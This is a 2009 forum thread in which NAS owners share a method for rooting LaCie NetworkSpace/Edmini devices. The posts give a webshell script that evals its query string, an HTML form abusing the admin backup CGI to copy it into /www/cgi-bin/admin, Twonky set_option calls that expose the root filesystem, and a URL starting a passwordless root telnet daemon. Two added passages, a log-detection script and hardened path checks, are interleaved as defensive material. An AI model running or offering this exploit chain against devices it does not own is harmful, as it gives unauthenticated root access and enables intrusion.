General NAS-Central Forums

PostPosted: Tue May 19, 2009 1:02 am 
Offline

Joined: Sun Apr 19, 2009 9:44 pm
Posts: 16
Hi,

I found a way to add a webshell without disassembling.

It assumes you have access to the admin of TwonkyMedia:

http://lacie.nas-central.org/wiki/NetworkSpace:_MultimediaServers

First you have to create a file webshell and copy it to a folder on a USB key.

Code:
#!/bin/sh
echo "Content-type: text/plain"
echo ""
echo $QUERY_STRING
eval $QUERY_STRING


Plug the USB key into the NAS.

I can't upload files, so copy this code into an HTML page:
Code:
<html>
<head>
   <title>Backup</title>
   <script type='text/javascript'>
   function submitForm()
   {
      document.edit_form.action = 'http://' + document.getElementById('ipnas').value + '/cgi-bin/admin/backup';
      document.edit_form.submit();
   }
   </script>
</head>
<body>

<form name='edit_form' method='post' >

NAS IP address or name
<br>
<input type='text' name='ipnas' id='ipnas' value='NetworkSpace' size='60'>
<br>

Source (path to a folder, not a file, on the USB key)
(No / at the end)
<br>
<input type='text'  name='select2' id='select2'  value='/home/usbdisksdb1/webshell' size='60'>
<br>

Destination (normally, don't modify)
(No / at the end)
<br>
<input type='text' name='select1' id='select1' value='/www/cgi-bin/admin' size='60'>
<br>

<input type='hidden' id='update' name='update' value='true'>

<br>
<a href='javascript:submitForm();'>Copy</a>

</form>

</body>
</html>



Open it, fill in the correct values and click Copy.

It will display an error, but it copies the file anyway; however, it creates a directory with a timestamp.

So, to know the name of the directory:

http://your ip:9000/rpc/set_option?contentbase=/

Now go to a config page of Twonky Media (http://your ip:9000/config) and look for a directory; you now have access to all directories.
Go to "/www/cgi-bin/admin/".
There is the directory with the timestamp.

Copy it and paste it into:
http://your ip/cgi-bin/admin/your directory/webshell?

The webshell is now working.

After that you can follow the procedure here:

http://jebimony.com/blog/content/add-ssh-lacie-edmini-v2


Last edited by belese on Thu May 21, 2009 5:01 pm, edited 3 times in total.

Top
 Profile  
 
PostPosted: Tue May 19, 2009 6:51 pm 
Offline

Joined: Thu Feb 05, 2009 8:46 pm
Posts: 98
Wow...

That's great! :D


Top
 Profile  
 
PostPosted: Tue May 19, 2009 7:35 pm 
Offline

Joined: Thu Feb 05, 2009 8:46 pm
Posts: 98
Hmmm. I'm trying to apply your hack, but I have a hard time modifying backup.html. You have single quotation marks (') where I have double ("), and in your third line they do not match. Your last line I cannot find at all.

Do you mind posting your entire modified backup.html?


Top
 Profile  
 
PostPosted: Tue May 19, 2009 11:18 pm 
Offline

Joined: Sun Apr 19, 2009 9:44 pm
Posts: 16
I cleaned the code and put it in my first post, so I removed this post.


Top
 Profile  
 
PostPosted: Mon May 25, 2009 9:18 pm 
Offline

Joined: Thu Feb 05, 2009 8:46 pm
Posts: 98
Thank you for the nice html file. :) I have tried it and it works.
I already had access because I have opened the NAS before, but now I have an additional webshell.

It is actually surprisingly simple if I understand it correctly. From a desktop PC, your html file issues commands available on the NAS, coded in scripts in /www/cgi-bin/admin and in /usr/bin/edmini.sh, to copy files from a USB disk or stick to any location on the NAS. These commands are meant to make backups, but they let you copy any file, anywhere, with executable rights, and we use it to put the webshell backdoor in place. You don't need Twonky to do that. You can exploit Twonky to find out the exact name of the directory, which is difficult to guess because it is the name of the original directory with a many-digit timestamp added. Therefore we set the top directory of Twonky to the root directory of the NAS (/) with your nifty command

Code:
http://networkspace:9000/rpc/set_option?contentbase=/


Then we can use Twonky's web config page to get a directory listing of /www/cgi-bin/admin and see the name of the "backed up" directory. In my case, I could access the webshell by 'going to'

Code:
http://networkspace/cgi-bin/admin/webshell-2009052522051243283626/webshell?whoami


in a web browser. The answer I got to the whoami was

"root"

:-)

Anyone else got it working?


Top
 Profile  
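The two posts above describe what the exploit looks like on the wire: a Twonky set_option call that exposes / and then a request into a timestamped directory under /cgi-bin/admin/ with a command in the query string. The script below is an added example (not from the thread or from LaCie) that flags both patterns in access-log lines; the common log format, the file name and the sample lines are constructed assumptions.

```shell
#!/bin/sh
# Added example, not from the thread. Flags access-log lines matching the
# two steps described above: opening the whole filesystem through Twonky's
# set_option?contentbase=/ and calling a script inside a timestamped
# directory under /cgi-bin/admin/ with a query string. Log format is the
# common format and the sample below is constructed; both are assumptions.
LOG="${TMPDIR:-/tmp}/nas_access_sample.log"
cat > "$LOG" <<'EOF'
192.168.1.10 - - [25/May/2009:22:05:12 +0000] "GET /cgi-bin/admin/backup HTTP/1.1" 200 512
192.168.1.10 - - [25/May/2009:22:06:01 +0000] "GET /rpc/set_option?contentbase=/ HTTP/1.1" 200 20
192.168.1.10 - - [25/May/2009:22:07:30 +0000] "GET /cgi-bin/admin/webshell-2009052522051243283626/webshell?whoami HTTP/1.1" 200 5
192.168.1.20 - - [25/May/2009:22:08:00 +0000] "GET /cgi-bin/admin/index.html HTTP/1.1" 200 2048
192.168.1.10 - - [25/May/2009:22:09:00 +0000] "GET /cgi-bin/admin/hack-2009052522051243283626/backdoor?/home/openshare/utelnetd%20-l%20/bin/bash HTTP/1.1" 200 0
EOF

# suspicious_requests LOGFILE: prints "<reason> <client> <request>" per hit
suspicious_requests() {
    awk '{
        client = $1; req = $7
        if (req ~ "^/rpc/set_option[?].*contentbase=/($|&)")
            print "twonky-root-exposed", client, req
        else if (req ~ "^/cgi-bin/admin/[^/]+-[0-9]+/[^?]+[?]" &&
                 match(req, "-[0-9]+/") && RLENGTH > 12)
            print "backup-dir-webshell", client, req
    }' "$1"
}

# count_suspicious LOGFILE: number of flagged lines
count_suspicious() {
    suspicious_requests "$1" | wc -l | tr -d ' '
}

suspicious_requests "$LOG"
```

The plain /cgi-bin/admin/backup call and the index page are left alone; only the root-exposure call and the two timestamped-directory requests are reported.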
 
PostPosted: Tue May 26, 2009 10:20 pm 
Offline

Joined: Sun Apr 19, 2009 9:44 pm
Posts: 16
Hi,

Thanks for translating my explanation into "real" English!!! 8-)
I'm sorry for my English, but I'm a French native speaker.


Top
 Profile  
 
PostPosted: Tue May 26, 2009 10:42 pm 
Offline

Joined: Thu Feb 05, 2009 8:46 pm
Posts: 98
belese wrote:
Thanks for translating my explanation into "real" English!!! 8-)


Thank you for the hack! Let's include it in the wiki. But first we need some more people that have used it successfully. For instance: does the original webshell file that is "backed up" need to have permissions set to executable? Does it need to come from an ext3-like file system?


Top
 Profile  
 
PostPosted: Tue May 26, 2009 10:45 pm 
Offline

Joined: Sun Apr 19, 2009 9:44 pm
Posts: 16
I think when it copies, it keeps the same rights, but I have not really tested it.
I think too that you don't need to have a USB key, and can copy directly from /home/openshare, but again, I have not tested it.
And for ext3, no, I've done everything from Windows with a USB key in NTFS (but be sure your webshell is in UNIX format!!). I've lost more than 2 hours because my webshell was in Windows text mode.


Top
 Profile  
 
PostPosted: Wed May 27, 2009 9:47 am 
Offline

Joined: Sun Mar 08, 2009 10:19 pm
Posts: 27
Hi,

Great find (why didn't I come up with it myself :D )

I confirm it works and you don't need the USB stick. Just copy the file (using a Samba/Windows share) to your openshare (create a new folder, as everything in this folder will be copied to the admin page, and you just want the backdoor there).

For instance: create a folder 'hack' and name the injection script 'backdoor' (the small script, not the html).

Now open your HTML page and edit the source path to '/home/openshare/hack' and that should be it.
You get an error that there is no USB device connected (so what :) ) and you need to find the timestamped folder (use Twonky).

To make the hack complete:
Copy the telnet daemon (utelnetd) to your openshare and call the following page:
http://networkspace/cgi-bin/admin/hack-<yourtimestamp>/backdoor?/home/openshare/utelnetd -l /bin/bash

This will start telnet without password check. Password check is not (yet) possible as root has no password assigned. You will be authenticated as root.

You're done :)

Kind regards,
Theike


Top
 Profile  
 
 Post subject: GREAT!
PostPosted: Sun Jun 07, 2009 10:00 am 
Offline

Joined: Tue Mar 18, 2008 2:35 pm
Posts: 6
Congratulations, this is really neat. THANK YOU!

I was less patient with my first edmini V2 more than 2 years ago and grabbed the screwdriver :twisted: very quickly. Yet, I was always hoping someone would come up with an idea!

I wonder if the hack can be applied to the 2big as well. Here, the RAID1 is kind of an obstacle when trying to access and modify the HD content with another computer. If that worked here (assuming similar applications and shell scripts on the 2big) as well the 2big might be modified while running in RAID 1. And that would mean: No problem with synchronizing two drives and no messing around with mounting them as RAID 1. As soon as I get hold of a 2big I will try it.


Top
 Profile  
 
PostPosted: Fri Jun 26, 2009 11:18 am 
Offline

Joined: Wed Jun 24, 2009 3:18 am
Posts: 3
Hi

Well, I am either doing something wrong, or LaCie have changed some of their scripts. (This is a bit moot, as I have already gained access to the box using earlier techniques, but some folks may strike the same problem.)

Also, my device is very new, but I am not sure how to check firmware versions etc.

Anyways...

I have created the directories and scripts as directed above, but when I load the webpage and press the button, the following error message appears briefly before the backup webpage then loads.

"df: /www/cgi-bin/admin: can't find mount point. /www/cgi-bin/admin/backup: line 131: [: -lt: unary operator expected"

Some lines of the backup script, i.e. /www/cgi-bin/admin/backup, are shown below; line 131 is in red.
I think the real culprit is line 121, in blue, as it appears to be checking that /home is in the destination path. If /home is not in the destination path, the script bombs out and prevents this hack from working!?

Is anyone else getting the same problem ?


Quote:
SRC_SIZE=`du -s $BACKUP_SRC | awk '{print $1}'`
DEST_SIZE=`df $BACKUP_DEST | grep /home | awk '{print $4}'`

if [ $ERR_CODE -eq 0 ] && [ -z "$BACKUP_DEST" ] || [ -z "$BACKUP_SRC" ]
then
# ---
# --- Something missing
# ---
ERR_CODE=2
fi

if [ $ERR_CODE -eq 0 ] && [ ${DEST_SIZE} -lt ${SRC_SIZE} ]
then
# ---
# --- no enough space in destination
# ---
ERR_CODE=3
fi

if [ $ERR_CODE -eq 0 ]



Top
 Profile  
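The quoted backup script shows the two defects the thread turns on: it never restricts where a "backup" may be read from or written to, and its free-space comparison breaks when df|grep /home returns nothing. The functions below are an added example (not LaCie firmware code and not from the thread) of the checks a CGI like this should make before copying; the allowed roots and the function names are assumptions.

```shell
#!/bin/sh
# Added example, not LaCie firmware code. Allowed roots are assumptions.
ALLOWED_SRC_ROOTS="/home/openshare /home/usbdisksda1 /home/usbdisksdb1"
ALLOWED_DEST_ROOT="/home/openshare"

# under_root PATH ROOT: succeeds if PATH is ROOT or lies inside it
under_root() {
    case "$1" in
        "$2"|"$2"/*) return 0 ;;
    esac
    return 1
}

# is_clean_path PATH: succeeds if PATH is absolute and has no '..' component
is_clean_path() {
    case "$1" in
        /*) ;;
        *) return 1 ;;
    esac
    case "/$1/" in
        */../*) return 1 ;;
    esac
    return 0
}

# validate_backup_paths SRC DEST: the check the original script lacks.
# Without it, DEST may be /www/cgi-bin/admin and SRC any folder, which
# is how the thread's webshell gets installed.
validate_backup_paths() {
    [ -n "$1" ] && [ -n "$2" ] || return 1
    is_clean_path "$1" && is_clean_path "$2" || return 1
    under_root "$2" "$ALLOWED_DEST_ROOT" || return 1
    for root in $ALLOWED_SRC_ROOTS; do
        under_root "$1" "$root" && return 0
    done
    return 1
}

# space_ok DEST_FREE SRC_SIZE: succeeds only when both are plain numbers
# and DEST_FREE >= SRC_SIZE. The original compared with [ $a -lt $b ]
# and died with "unary operator expected" when df|grep /home was empty.
space_ok() {
    for n in "$1" "$2"; do
        case "$n" in ''|*[!0-9]*) return 1 ;; esac
    done
    [ "$1" -ge "$2" ]
}
```

With these checks the destination from the thread's form, /www/cgi-bin/admin, is refused outright, and an empty df result fails closed instead of crashing the script.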
 
PostPosted: Fri Jun 26, 2009 5:47 pm 
Offline

Joined: Thu Feb 05, 2009 8:46 pm
Posts: 98
You can see the firmware version by surfing to the Configuration web page and then clicking "Support".

Mine is version 1.1.6.


Top
 Profile  
 
PostPosted: Mon Jun 29, 2009 11:20 am 
Offline

Joined: Wed Jun 24, 2009 3:18 am
Posts: 3
And mine, with a possibly new set of (not so hackable) backup scripts, is version 1.1.8.

Has anyone else with version 1.1.8 had any success in using the approach as defined in this thread ?

Ack.


Top
 Profile  
 
PostPosted: Tue Jun 30, 2009 7:51 pm 
Offline

Joined: Sun Mar 08, 2009 10:19 pm
Posts: 27
Any chance of providing us with a copy of the .8-scripts?

Kind regards,
Theike


Top
 Profile  
 
PostPosted: Tue Jun 30, 2009 11:20 pm 
Offline

Joined: Sun Apr 19, 2009 9:44 pm
Posts: 16
Hi,

I've got the same error, but it copies the file anyway (for me, but I also have 1.1.6).


Top
 Profile  
 